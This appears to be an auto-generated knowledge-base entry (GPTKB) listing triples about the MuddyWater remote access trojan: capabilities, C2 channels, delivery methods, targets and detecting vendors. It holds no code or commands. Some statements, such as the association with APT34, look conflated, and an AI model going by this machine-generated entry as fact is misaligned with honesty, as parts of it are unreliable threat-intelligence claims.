MuddyWater Remote Access Trojan

GPTKB entity

Statements (39)
Predicate Object
gptkbp:instanceOf malware
gptkbp:abilities gptkb:remote_control
data exfiltration
command execution
keylogging
gptkbp:alsoKnownAs gptkb:MuddyWater_RAT
gptkbp:associatedWith gptkb:APT34
Iranian threat actors
gptkbp:C2Communication gptkb:HTTP
HTTPS
DNS tunneling
gptkbp:category cybercrime
advanced persistent threat tool
gptkbp:deliveredBy phishing emails
malicious attachments
gptkbp:detects gptkb:Kaspersky
gptkb:Symantec
gptkb:Microsoft_Defender
gptkbp:firstObserved 2017
https://www.w3.org/2000/01/rdf-schema#label MuddyWater Remote Access Trojan
gptkbp:operatingSystem gptkb:Windows
gptkbp:programmingLanguage gptkb:Python
gptkb:PowerShell
gptkb:C#
gptkbp:purpose cybercrime
data theft
gptkbp:relatedTo gptkb:MuddyWater_group
gptkbp:target gptkb:energy
government organizations
defense sector
telecommunications sector
gptkbp:usedBy gptkb:MuddyWater
gptkbp:uses PowerShell scripts
custom backdoors
living-off-the-land binaries
obfuscation techniques
gptkbp:usesMalware Remote Access Trojan
gptkbp:bfsParent gptkb:MuddyWater_RAT
gptkbp:bfsLayer 7